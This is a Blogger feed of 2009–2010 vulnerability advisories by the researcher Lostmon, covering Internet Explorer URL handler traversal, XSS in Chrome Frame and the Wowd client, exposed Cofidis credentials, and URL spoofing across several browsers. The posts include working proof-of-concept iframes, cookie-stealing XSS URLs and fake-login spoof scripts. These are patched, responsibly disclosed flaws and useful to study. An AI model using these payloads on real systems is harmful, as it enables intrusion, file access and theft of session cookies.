La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-79071247627386588002010-02-10T12:01:00.007-08:002010-02-10T12:23:18.558-08:00Internet explorer 7 & 8 URL Validation Vulnerability############################################<br />Internet explorer 7 & 8 url validation vulnerability<br />Original Advisore: http://lostmon.blogspot.com/<br />2010/02/internet-explorer-7-8-url-validation.html<br />Vendor URl: http://www.microsoft.com<br />related adv:http://lostmon.blogspot.com/<br />2010/02/internet-explorer-6-7-8-url-validation.html<br />related bulletin: MS10-002 and ms10-007<br />Related CVE 2010-0027<br />Related OSVDB ID: 62245 and 62245 <br />Related Secunia: SA38501 and SA38209<br />Related BID: 37884<br />############################################<br /><br /><br />############<br />Description<br />############<br /><br /><br />A remote code execution vulnerability exists in the way<br />that Internet Explorer incorrectly validates input. An<br />attacker could exploit the vulnerability by constructing<br />a specially crafted URL. When a user clicks the URL, the<br />vulnerability could allow remote code execution. An<br />attacker who successfully exploited this vulnerability<br />could gain the same user rights as the logged-on user.<br />If a user is logged on with administrative user rights,<br /><br /><br />#################<br />Versions afected<br />#################<br /><br />I have tested in Internet Explorer 7 & 8<br />in this versions of windows<br /><br />All versions of Windows 7<br />Windows xp home<br />Windows xs pro<br /><br />So you can look the explotability index<br />From Relared Microsoft bulletin to get<br />a complete List of products affected.<br /><br />#############<br />Timeline<br />#############<br /><br />discovered 05-11-2009<br />Reported to vendor 15-11-2009<br />Vendor response:15-11-2009<br />vendor accepts in case manager 19-11-2009<br />vendor patch 21-01-2010<br />Vendor Patch2:09-02-2010<br />Public Disclosure: 21-01-2010<br />Details Disclosure:10-02-2010<br /><br /><br />##############<br />Solution<br />##############<br /><br />See <br />http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx<br />and <br />http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx<br /><br />for more details and for download vendor's patch<br /><br />#######################<br />Sample code and PoC´s<br />#######################<br /><br />This Vulnerability is bassed in the way<br />that Internet explorer validate Uri handlers<br />and the special chart '#'<br /><br />for testing and undestanding first open internet explorer<br />and write in teh address bar a fake handler like `handler:' <br />it cause that IE shows 'res://ieframe.dll/unknownprotocol.htm'<br />internal page , because the protocol is unknow.<br />if we do => handler:http://[some-host]' Ie wait to open <br />the host, but don´t show any error or unknow protocol <br />error page.<br /><br />If we Write at the adrress bar 'handler:handler2:'<br />IE shows again 'res://ieframe.dll/unknownprotocol.htm' page.<br /><br />But if we concatenate two unknow protocol handlers and <br />use the special char '#' like 'handler:handler#:'<br />internet explorer shows a alert warning<br />with 'internet explorer can´t find file:///'<br /><br />With this convination IE use file: protocol handler.<br /><br />With this alert we can think... if we concatenate two handlers and #<br />char and a file path we can access to files on the hard disk.<br /><br />"handler:handler#:c:\windows\calc.exe'<br />But we get again 'internet explorer can´t find the file'<br /><br />Them we look for trasversal file access like<br />handler:handler#:../../../../C:\windows/calc.exe’<br />Them Ie promp us to download or execute the file.<br />we have bypass the restrictions!!!<br /><br />so we are working in the address bar<br />Can a web page use this issue to make the same and ask<br />for download it ? YES<br /><br />we can construct a web page with a iframe like:<br /><br />############# PoC one #################<br /><html><br /><iframe id="myIframe"<br />src="handler:handler#:../../../../C:\windows/calc.exe"></iframe><br /></html><br />################# EOF #################<br /><br />If we open it via local folder, or via local server or<br />lan server or remote server, in all cases iE ask for download<br /><br />them we can access any file in the hard disk so<br />can we execute or read the content of a file ?? YES<br /><br />if we know a txt file path we can do similar<br />( put a txt file in c: root and wite some content it)<br />and them :<br /><br />############## PoC Two #############<br /><html><br /><iframe id="myIframe"<br />src="handler:handler#:../../../../C:\our_txtfile.txt"></iframe><br /></html><br /><br />############# EOF #################<br /><br />wen we open this Poc , it read the content from our_txtfile.txt<br />and show it in the frame.<br /><br /><br />we can execute files ?? YES<br /><br />we can execute a html file or xml file or search-ms files<br />from hard disk for example:<br /><br />############# PoC Tree ###############<br /><html><br /><iframe id="myIframe"<br />src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"><br /></iframe><br /></html><br /><br />############### EOF ###########<br /><br />if we look it executes Explorer with a local search :D<br /><br /><br />can we read the content of any file and upload it to a server or<br />manage the content ??<br /><br />i don´t have found a way to do it<br />all times internet explorer denies the access to the content from<br />iframe.<br /><br />############# PoC four ##############<br /><br /><html><br /><head><br /></head><br /> <body><br /><script type="text/javascript"><br />function getContentFromIframe(iFrameName)<br />{<br /> var myIFrame = document.getElementById(iFrameName);<br /> var content = myIFrame.contentWindow.document.body.innerHTML;<br /> alert('content: ' + content);<br /><br /> content = 'change iframe content';<br /> myIFrame.contentWindow.document.body.innerHTML = content;<br />}<br /></script> <iframe id="myIframe"<br />src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe><br /><br /> <a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a><br /><br /></body><br /></html><br /><br />##################### EOF #############################<br /><br />it give a access deniet error<br />if we look to use XMLHttpRequest()<br /><br />it does not work again and access is denied:<br /><br />########### PoC Five ######################<br />var contents;<br />var req;<br />req = new XMLHttpRequest();<br />req.onreadystatechange = processReqChange;<br />req.open(’GET’,<br />‘handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms’,<br />true);<br />req.send(”);<br />############ EOF #############<br /><br />if we use it as a activex it<br />shows again a access denied :P<br /><br />############### PoC six #############<br /><br /><html><body><div><br /><br /><script><br />function getHTTPObject()<br />{<br /> if (typeof XMLHttpRequest != 'undefined')<br /> {<br /> return new XMLHttpRequest();<br /> }<br /> try {<br /> return new ActiveXObject("Msxml2.XMLHTTP"); }<br /> catch (e)<br /> {<br /> try<br /> {<br /> return new ActiveXObject("Microsoft.XMLHTTP");<br /> }<br /> catch (e) {}<br /> }<br /> return false;<br />}<br />x = getHTTPObject();<br />x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false);<br />x.send(null);<br />alert(x.responseText);<br /><br /></script><br /><!-- end of input --><br /></div></body></html><br /><br />################ EOF ######################<br /><br />Them we can think that we can read txt files , execute html,xml<br />search-ms files , and download and execute Binaries files from the<br />victims hard disk , only with view a crafted web page.<br /><br />Microsoft has pached it and has release a secutiry bulletin<br />that solve this issue see <br />http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx<br />and<br />http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx<br />for details and for download the security update that solve this <br />issue and seven vulnerabilities more.<br /><br />#################### €nd ################<br /><br />Thnx to Google security Team for his support<br />Thnx to MSRC for his support and acknowledgments<br />Thnx To icar0 & sha0 from Badchecksum<br />Thnx To Brink For test with me in some windows :D<br />Thns to estrella to be my ligth<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-23631335555038559282010-01-21T10:17:00.008-08:002010-01-24T03:08:14.698-08:00Internet explorer 6 7 8 URL Validation Vulnerability###################################<br />Internet explorer 6 7 and 8 URL Validation Vulnerability<br />Vendor :http://www.Microsoft.com<br />Vendor notify:YES vendor confirmed :YES<br />REF Bulletin:<a href="http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx" target="_blank">MS10-002</a><br />#########################################<br /><br />A remote code execution vulnerability exists in the way that Internet Explorer incorrectly validates input. An attacker could exploit the vulnerability by constructing a specially crafted URL. When a user clicks the URL, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.<br /><br /> To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see <a href="http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx" target="_blank">MS10-002</a> and CVE-2010-0027.<br /><br />No more details at this time I have a PoC But At this moment it, is private.<br /><br />Time Line for this vulnerability:<br /><br />discovered 05-11-2009<br />Reported to vendor 15-11-2009<br />Vendor response:15-11-2009<br />vendor accepts in case manager 19-11-2009<br />vendor patch 21-01-2010<br /><br />#################€nd#############<br /><br />Thnx to estrella To be mi ligth<br />Thnx To icar0 & sha0 from Badchecksum<br />Thnx To Google security Team For support<br />Thnx To MSRC for Support<br /><br />atentamente:<br />Security Research & Analisys.<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-61647242483443909592009-11-19T04:04:00.005-08:002009-11-19T04:20:52.636-08:00Google Chrome Frame null domain XSS#####################################<br />Google Chrome Frame null domain XSS<br />vendor url:http://www.google.com/chromeframe<br />vendor changelog:http://googlechromereleases.blogspot.com/<br />2009/11/google-chrome-frame-update-bug-fixes.html<br />Advisore:http://lostmon.blogspot.com/<br />2009/11/google-chrome-frame-null-domain-xss.html<br />Vendor notify:yes Exploit available:YES<br />######################################<br /><br /><br />######################<br />Description by vendor<br />######################<br /><br />Google Chrome Frame is a free plug-in for Internet Explorer. <br />Some advanced web apps, like Google Wave, use Google Chrome <br />Frame to provide you with additional features and better performance. <br /><br />Google Chrome Frame is an early-stage open source <br />plug-in that seamlessly brings Google Chrome's open<br />web technologies and speedy JavaScript engine to <br />Internet Explorer.<br /><br />################<br />version Afected<br />################<br /><br />4.0.223.9 (Official Build 29618)<br />WebKit: 532.3<br />V8: 1.3.16<br />User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)<br />AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3<br /><br />Not afected version:<br /><br />4.0.245.1 (Official Build 31970)<br />WebKit: 532.5<br />V8: 1.3.18.6<br />User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) <br />AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5<br /><br />you can find aditional information here:<br />http://googlechromereleases.blogspot.com/<br />2009/11/google-chrome-frame-update-bug-fixes.html<br /><br />#####################<br />Cross Site scripting<br />#####################<br /><br />Create a html document and some to test =><br /><br /><iframe src="javascript:alert(1)></iframe><br /> => this opens the iframe and execute the alert<br />( this is correct)<br /><br /><iframe src="cf:javascript:alert(1)></iframe> <br />this does not work , not show the alert ( correct)<br /><br />and here is the flaw =><br /><iframe src="cf:view-source:javascript:alert(1)></iframe><br /><br />This show & executed the alert it works on local & remote <br />scenario or via address bar too.<br />This bypassed cross-origin protections !!!<br /><br />For google chrome browser test this<br />at the address bar =><br />view-source:javascript:alert(1)<br /><br />this execute the alert but recently google has made changes<br />in about:blank page and this issue is only exploitable<br />via address bar ,not in a iframe or frame or html document<br />so for that i think that this issue isn´t exploitable in a<br />remote scenario.<br /><br />###########<br />crashes<br />###########<br /><br />cf:view-source:about@: crash<br />cf:about@: => crashing the tab<br /><br />##########<br />Solution<br />############<br /><br />Google has automatic release a new version<br />of Chrome Frame 4.0.245.1 (Official Build 31970)<br />and this version is not afected.<br /><br />#################€nd#############<br /><br />Thnx to estrella To be mi ligth<br />Thnx To icar0 & sha0 from Badchecksum<br />Thnx To Google security Team<br /><br />atentamente:<br />Security Research & Analisys.<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1965417791411566522009-10-27T11:39:00.004-07:002009-11-03T01:45:32.930-08:00Wowd search client multiple variable xss##########################################<br />Wowd search client multiple variable xss<br />Vendor URL: http://www.wowd.com/<br />Advisore:http://lostmon.blogspot.com/2009/10/<br />wowd-search-client-multiple-variable.html<br />Vendor notify:yes exploit available:yes<br />##########################################<br /><br />################<br />What is Wowd?<br />################<br /><br />Wowd is a real-time search engine for discovering <br />what's popular on the web right now.<br /><br />In essence, the company has made a peer-to-peer <br />search engine powered by what other Wowd users <br />are looking at online rather than studying and <br />ranking sites based on an arcane link structure. <br />Taking search and breaking it into millions of <br />tiny pieces all run by individual users who have<br />downloaded the Wowd client completely changes <br />the operation -- and economics -- of a search <br />engine. The more times that someone in the Wowd<br />crowd clicks on a link within a recent time <br />frame, the higher the link's ranking.<br /><br /><br />##########################<br />Vulnerability description<br />##########################<br /><br />Wowd client contains a flaw that allows a remote<br />cross site scripting attack.This flaw exists because<br />the application does not validate In the URI dialog<br />'sortby' 'tags' and 'ctx' variables upon submision to<br />'index.html' script. This could allow a user to create <br />a specially crafted URL that would execute arbitrary <br />code in a user's browser within the trust relationship <br />between the browser and the server,leading loss of integrity.<br /><br />This issue can be dangerous , because if you are running<br />Wowd client , you have all of this vulnerabilities because<br />this issue can be exploited accross all browsers,<br />include ie8 with the XSS filter ( WoW ! )<br /><br />#################<br />Versions<br />################·<br /><br />Wowd client 1.3.0 vulnerable<br />Wowd client 1.3.1 Not vulnerable<br /><br /><br />#################<br />SOLUTION<br />#################<br /><br />Upgrade to version 1.3.1 or higher, as it has been <br />reported to fix this vulnerability. An upgrade is <br />required as there are no known workarounds.<br /><br /><br />###################<br />Proof of Concept.<br />###################<br /><br />#############<br />Test<br />#############<br /><br />I test it in ie8, firefox 3.5.3 and safari 4<br /><br />in all cases the xss is executed include ie8 with xss filter :D<br /><br />a remote user can compose a html document<br />with a iframe and this source for the iframe:<br /><br />http://localhost:8101/wowd/index.html?search&sortby=rank%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E<br /><br />the browser executes the xss ,if you access directly to <br />this url the xss is executed too.<br /><br />aditionaly wen wowd show his results , we have a functionality<br />to add "tags" to a url.<br /><br />Example:<br /><br />http://localhost:8101/wowd/index.html?search&query=a&<br />sortby=rank&tags=english|S0B0707656E676C6973680D02<br /><br />this shows a indexed search with tag 'english' we can add a <br />crafted tag that allow to execute a xss like:[tag]|[token]<br /><br />example:<br /><br />http://localhost:8101/wowd/index.html?search&query=a<br />&sortby=rank&tags=english|S0B0707656E676C6973680D02,<br />%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E|S0B0707656E676C6973680D02<br /><br />and it executed the xss in the tags labels.<br /><br />ctx variable is also afected too<br /><br />http://localhost:8101/wowd/index.html?search&page=2&q=<br />&sortby=rank&tags=news|S0807046E6577730D02&ctx=1995393737681%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E<br /><br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<br />----------------------------------------------<br />Browser: Internet Explorer 8 (Windows)<br />Browser: Firefox 3.5 (Windows)<br />Browser: Safari 4 (Windows)<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-77505770935017193022009-10-15T11:33:00.008-07:002010-02-13T11:11:46.310-08:00Cofidis.es pudo ver sus datos comprometidos###########################################<br />Cofidis.es pudo ver sus datos comprometidos<br />Vendor: www.cofidis.es<br />Falla: cedenciales criticas al descubierto<br />Actualizado:13-02-2010<br />###########################################<br /> <br />Cofidis es una empresa formada por varios grupos de<br />crédito que agrupan diferentes servicios dentro del<br />panorama de finanzas mundiales.<br /><br />La definición según podemos leer en su web:<br />"Somos líderes europeos del crédito por teléfono: <br />tenemos más de 8 millones de clientes. En España, Ya<br />contamos con más de 15 años de experiencia y un equipo<br />de más de 800 colaboradores."<br /><br />Cofidis.es pudo verse afectado por un fallo atraves del<br />cual podrían terceras personas haber podido tener acceso<br />a datos de carácter personal, al haber dejado al descubierto<br />las credenciales de acceso root al portal y así mismo al dejar <br />al descubierto las credenciales de acceso a la base de datos<br />del portal.<br /><br />Para hacernos una idea de qué tipo de datos pueden haber sido <br />vistos o "robados" por terceros, tan solo debemos mirar uno de<br />los formularios de solicitud de crédito, y por los datos que<br />se nos piden se puede saber qué tipo de datos podría contener<br />la base de datos.<br />https://www.espaciocliente.cofidis.es/cofidis/preapprove/PreApproveContractDisplayAction.do <br /><br />Esta noticia Llego a mí, después observar un post en Twitter<br />en el cual se daba una url del portal Cofidis.es y el acceso<br />a un txt sin ningún tipo de protección, y el cual contenía <br />las credenciales antes mencionadas.<br /><br />Después de observar esta situación, y hablado con algunos de<br />los miembros del grupo de discusión e investigación, decidimos<br />mirar desde cuando podía haberse dado esta circunstancia y el <br />posible origen de la noticia. Haciendo una búsqueda rápida en <br />los motores de búsqueda habituales<br />##################<br />Actualizacion<br />##################<br /><br />al parecer la primera noticia sobre<br />esta circunstlancia podria ser este post<br />en un blog en el cual se habla del tema<br />sin revelar en si las direcciones directas.<br />Los Post de twiter habrian podido sacar la<br />informacion para sus post<br /><br />el post es del dia 11-10-2009<br /><br />http://86400.es/2009/10/11/<br />la-seguridad-de-los-que-manejan-nuestro-dinero/<br /><br />#################################<br /><br /> Llegamos a un Post en twitter del día 12-10-2009.<br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/twitter_dia_12.gif" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/twitter_dia_12.gif" height="250" width="400"></center></a><br />Y uno posterior del día 13-10-2009.<br /> <a href="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/twitter_dia_13.gif" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/twitter_dia_13.gif" height="250" width="400"></center></a><br />y otro mas el dia 13-10-2009<br /> <a href="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/cofidis_twitter.gif" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/cofidis_twitter.gif" height="250" width="400"></center></a><br /><br />El día 14-10-2009 por la tarde el txt que contenía estas<br />credenciales fue retirado del raíz del portal cofidis.es<br />Con lo cual se puede pensar que esos datos tan sensibles<br />pudieron estar al alcance de todo el mundo durante al<br />menos tres días.<br /><br />Google muestra en su cache, una imagen de dicho documento <br />con fecha Del día 13-10-2009 mostrando las credenciales<br /><br />http://209.85.229.132/search?q=cache:nrpZAY7spqYJ:www.cofidis.es/xxxxx.txt+http://www.cofidis.es/xxxx.txt&cd=8&hl=es&ct=clnk&gl=es<br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/cofidis_google.gif" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/cofidis_google.gif" height="250" width="400"></center></a><br /> <br />Pero esta sería la fecha en la cual google tomo esa instantánea<br />de ese documento, pudiendo haber reemplazado a una anterior eso <br />Los logs del servidor de cofidis deberían mostrar cuando fue la<br />primera vez que el spider de google pudo rastrear ese txt.<br /><br />Así mismo si realizamos una búsqueda en google por el fichero txt<br />entre los resultados primeros puede apreciarse que Google también<br />revela esas credenciales faltaría saber cuando fue incluido en la <br />Indexación ese archivo, para intentar averiguar desde que fecha se<br />pudo haberse producido esta situación.<br /><br />http://www.google.es/search?q=cofidis.txt<br /> <a href="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/cofidis_google_search.gif" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/cofidis_google_search.gif" height="250" width="400"></center></a><br /><br />Como pudo Un administrador dejar deliberadamente un archivo<br />con información tan sensible a la vista de cualquier visitante,<br />se preguntara más de uno.<br /><br />Seguramente el admin no sabía nada de la existencia de ese<br />fichero, o eso creemos o queremos creer) Debió ser un hackeo,<br />por el tipo de fichero generado y su disposición y los datos <br />que contiene podría haberse tratado de algún agujero de <br />seguridad en la web , atraves del cual el atacante hubiese <br />podido incluir algún archivo externo.<br />(esta vulnerabilidad es conocida como RFI o remote file include) <br />pues hay algunos scripts de los que corren por la red, que <br />justamente hacen eso y mirando su fuente se puede observar que <br />justamente sacan esos datos de la maquina o inyectan una <br />Shell en php.<br /><br />Creo que cofidis debería dar explicaciones de este hecho y así<br />mismo debería verse como le afecta este acontecimiento a cofidis,<br />ante la <a href="https://www.agpd.es/portalweb/index-ides-idphp.php">LOPD</a><br />y que datos han sido comprometidos, no por mi porque por suerte<br />yo no me encuentro en su base de datos que yo sepa, pues nunca<br />necesite sus servicios.<br /><br />Desde el grupo de investigación y desarrollo de Lostmon's <br />Groups queremos hacer un llamamiento a que las empresas como<br />cofidis y otras que trabajan con datos personales tan <br />sensibles y de tanta confidencialidad, deberían invertir <br />parte de sus beneficios en asegurar que esos datos no estarán<br />accesibles y deberían hacer lo posible por protegerlos como <br />se les pide en la <a href="https://www.agpd.es/portalweb/index-ides-idphp.php">LOPD</a>.<br /><br />Bien es cierto que en seguridad, no hay nada seguro, o que<br />lo bonito de la seguridad es la inseguridad que trae por si<br />misma. Y bien es cierto que por mucho que los administradores<br />pongan énfasis y empeño en asegurar servicios y sistemas, <br />siempre hay gente, que va por delante de ellos.<br /><br />Este analisis ha sido realizado por <a href="http://climbo.wordpress.com" target="_blank">Climbo</a> y por Lostmon<br /><br />thank to all Lostmon groups team<br />Thnx to estrella to be my ligth<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-77858879051460727722009-09-16T06:52:00.006-07:002009-09-16T08:26:43.452-07:00IE8 Save as Title BugIE8 is have a bug thats allow denial access to <br />function "save as" if a html document have a very<br />long title.<br /><br />By default wen a user try to clik in "save as " <br />the browser use the html title as the file name to<br />save; but if this title is very long , explorer give<br />a error because it can´t save this file.<br /><br />Explorer can´t save files with the title longer<br />than 261 characters , them explorer give a warning<br />with a error that the file can´t save.<br /><br />I think that this not have any security implication,<br />and i send it to MSRC and they think the same.<br /><br />MSRC Response:<br /><br />"agree with your assessment that this does not appear to<br />be a security issue. It may be a bug though so I am going<br />to forward your information directly to the product team <br />for considerations in a future non-security update"<br /><br /><br />a simple PoC of this situation:<br /><br /><HTML><br /><TITLE>A*261 chars</TITLE><br /><HTML><br /><br />###########End #################<br /><br />thank to all Lostmon groups team<br />Thnx to estrella to be my ligth<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-5668847880297842222009-09-01T05:58:00.005-07:002009-10-15T05:03:41.147-07:00Security Researcher Acknowledgments from Microsoft<div style="text-align: center;"><b>Security Researcher Acknowledgments </b></div><div><div style="text-align: center;"><b>for Microsoft Online Services</b></div><div><br /><div style="text-align: justify;">The Microsoft Security Response Center (MSRC) is pleased to recognize the security researchers who have helped make Microsoft online services safer by finding and reporting security vulnerabilities. Each name listed represents an individual or company who has responsibly disclosed one or more security vulnerabilities in our online services and worked with us to remediate the issue.</div><a href="http://technet.microsoft.com/en-us/security/cc308575.aspx#0809">http://technet.microsoft.com/en-us/security/cc308575.aspx#0809</a><br /><br /></div><div>August 2009 Security Researchers<br /><br /><ul><br /><li><b>Lostmon Lords<br />lostmon.blogspot.com</b></li><br /><li>Knuchel Steven<br />xylitol.free.fr</li><br /><li>Nenad Vijatov<br />blog.vijatov.com</li></ul><br /></div><div>--</div><div><br /></div><div>thank to all Lostmon groups team</div><div>Thnx to estrella to be my ligth</div><div><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: <a href="http://lostmon.blogspot.com/">http://lostmon.blogspot.com/</a><br />Google group: <a href="http://groups.google.com/group/lostmon">http://groups.google.com/group/lostmon</a> (new)<br />--<br />La curiosidad es lo que hace mover la mente....<br /></div></div><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-12268926942984176742009-08-15T09:54:00.010-07:002010-04-18T08:19:48.117-07:00Multiple Browsers Fake url folder & file Same origin Spoof#########################################<br />
Multiple Browsers Fake url folder & file Same origin Spoof <br />
Original Article:http://lostmon.blogspot.com/<br />
2009/08/multiple-browsers-fake-url-folder-file.html<br />
##########################################<br />
<br />
##############<br />
Abstract<br />
##############<br />
<br />
One user open his browser and try to navigate to<br />
http://www.host.com/admin/admin.php this url is in<br />
the remote server and if the user has privileges ,<br />
can access to file admin.php<br />
<br />
If the file admin.php isn`t in the server<br />
the user get a 404 http error by server.<br />
<br />
If the user try to browse http://www.host.com/admin/<br />
and this path isn´t in the server , the user get again a 404<br />
http error.<br />
<br />
If the user press refresh button the page reloads the content<br />
and if the user press ctrl+f5 it refresh all content from<br />
the page.<br />
<br />
Some times those http errors like 404 ,403 etc are managed<br />
by a third part app, a toolbar, or with a predefined<br />
dynamic content build inside the browser.<br />
<br />
#######################<br />
Explanation<br />
#######################<br />
<br />
Multiple browsers have a flaw in this request response<br />
that allow a attacker to spoof the url or spoof the content<br />
from a inexistent file or path or spoof the url and content<br />
from a trust file or Path.<br />
<br />
Also a attacker can "trap" the broser in spoofed web and<br />
wen the user press f5 or refresh button , the page show<br />
the spoofed content or if the user press ctrl+f5 the page<br />
show the spoofed content , Only in Opera Browser this last<br />
issue does not work. <br />
<br />
<br />
##################<br />
Testing<br />
##################<br />
<br />
I test it with windows xp home sp3 fully patched.<br />
for testing let´s to write some script like:<br />
<br />
####################<br />
SOURCE CODE OF POC<br />
####################<br />
online PoC =>http://cmspatch.200u.com/urlspoof.html<br />
<blockquote><pre><html>
<head></head><body>
<title>Multiple Browsers Fake url folder & file Same Origin Spoof</title>
<center>
<h1>Multiple Browsers Fake url folder & file Same origin Spoof By Lostmon</h1>
</center>
<p>
<a href='modules/profile/admin/admin.php' target='_blank'><h2>real path</h3></a>
<a href='javascript:spoofolder()'><h2>spoof a url folder !!</h2></a> Non existent path
<a href='javascript:spoofile()'><h2>spoof a url file !!</h2></a> this file exist in the server.
<a href='javascript:spoofauth()'><h2>spoof a url with auth basic !!</h2></a><br>only exist Protected and have password.
<p></p>
<strong>pass for the cms. user Dismark pass souaktendio.</strong><br>
<strong>pass for Portected folder. user terrapro pass mayoristas.</strong>
<p>
<script>
function spoofolder()
{
a = window.open('modules/login')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofile()
{
a = window.open('modules/system/admin.php')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofauth()
{
a = window.open('protected/admin/admin.php')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
</script>
</body></html>
</blockquote></pre><br />
######## END SOURCE #####<br />
<br />
Save it as c:/test/urlspoof.html for example.<br />
I use one alert for show the real window.location.<br />
for testing i have open the file using file:/// protocol handler<br />
and for remote test i have upload the file to a server.<br />
to a apache in windows 2003 and in a apache on linux red hat.<br />
<br />
server windows:<br />
Windows Server 2003 <br />
Apache/2.2.8 Win32 <br />
PHP/5.2.6<br />
Server at ***********.com<br />
<br />
server linux:<br />
<br />
Apache/2.2.11 (Unix) mod_ssl/2.2.11 <br />
OpenSSL/0.9.8e-fips-rhel5 <br />
mod_auth_passthrough/2.1<br />
FrontPage/5.0.2.2635 Server <br />
at ***********.com<br />
<br />
in all test cases the server send the correct<br />
http response.<br />
<br />
########################<br />
Localy afected Browsers<br />
########################<br />
<br />
For this test i use file protocol handler and <br />
only test file spoof and path spoof.<br />
<br />
1 - Firefox 3.5.1 and 3.5.2<br />
open urlspoof via file c:/test/urlspoof.html and click<br />
in any spoof function in al cases firefox show the spoofed <br />
url and content.(firefox 3.5.2 seems not vulnerble)<br />
<br />
